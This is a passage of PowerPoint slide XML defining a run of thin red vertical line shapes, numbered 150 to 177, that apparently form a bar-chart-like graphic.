        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="object 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3527493" y="5053192"/>
            <a:ext cx="0" cy="934953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="471805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="471198"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="object 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3527493" y="5050216"/>
            <a:ext cx="0" cy="939986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="474344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="474201"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="object 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547328" y="4692224"/>
            <a:ext cx="0" cy="1294841"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="653414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="653353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="object 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547328" y="4689249"/>
            <a:ext cx="0" cy="1301132"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="656589">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="656356"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="object 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3567554" y="5003210"/>
            <a:ext cx="0" cy="984029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="496569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="496421"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="object 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3567554" y="5000235"/>
            <a:ext cx="0" cy="990320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="499744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="499423"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="object 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3587389" y="4592264"/>
            <a:ext cx="0" cy="1395509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="704214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="703796"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="object 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3587389" y="4589289"/>
            <a:ext cx="0" cy="1401800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="707389">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="706799"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="object 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607221" y="5086510"/>
            <a:ext cx="0" cy="900976"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="454660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="454385"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="object 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607221" y="5083534"/>
            <a:ext cx="0" cy="907267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="457835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="457387"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="object 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627055" y="4742205"/>
            <a:ext cx="0" cy="1245765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="628650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="628131"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="object 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627055" y="4739230"/>
            <a:ext cx="0" cy="1250799"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="631189">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="631133"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="object 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3646888" y="5230895"/>
            <a:ext cx="0" cy="756268"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="381635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="381524"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="object 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3646888" y="5227919"/>
            <a:ext cx="0" cy="762559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="384810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="384526"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="object 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666722" y="4825506"/>
            <a:ext cx="0" cy="1161456"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="586105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="586095"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="object 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666722" y="4822531"/>
            <a:ext cx="0" cy="1167748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="589280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="589098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="object 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686555" y="5142043"/>
            <a:ext cx="0" cy="845610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="426719">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="426361"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="object 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686555" y="5139069"/>
            <a:ext cx="0" cy="851902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="429894">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="429364"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="object 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706389" y="4719991"/>
            <a:ext cx="0" cy="1267157"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="639444">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="639341"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="object 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706389" y="4717016"/>
            <a:ext cx="0" cy="1273449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="642619">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="642344"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="object 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3726221" y="5253110"/>
            <a:ext cx="0" cy="734876"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="370314"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="object 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3726221" y="5250134"/>
            <a:ext cx="0" cy="739909"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="373380">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="373316"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="object 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746056" y="4731094"/>
            <a:ext cx="0" cy="1255832"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="633730">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="633738"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="object 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746056" y="4728120"/>
            <a:ext cx="0" cy="1262124"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="636905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="636740"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="object 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765888" y="5130940"/>
            <a:ext cx="0" cy="856933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="432435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="431965"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="object 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765888" y="5127964"/>
            <a:ext cx="0" cy="861969"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="434975">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="434967"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="object 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786117" y="4792180"/>
            <a:ext cx="0" cy="1195431"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="603250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="602912"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="object 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786117" y="4789206"/>
            <a:ext cx="0" cy="1201723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="606425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="605915"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
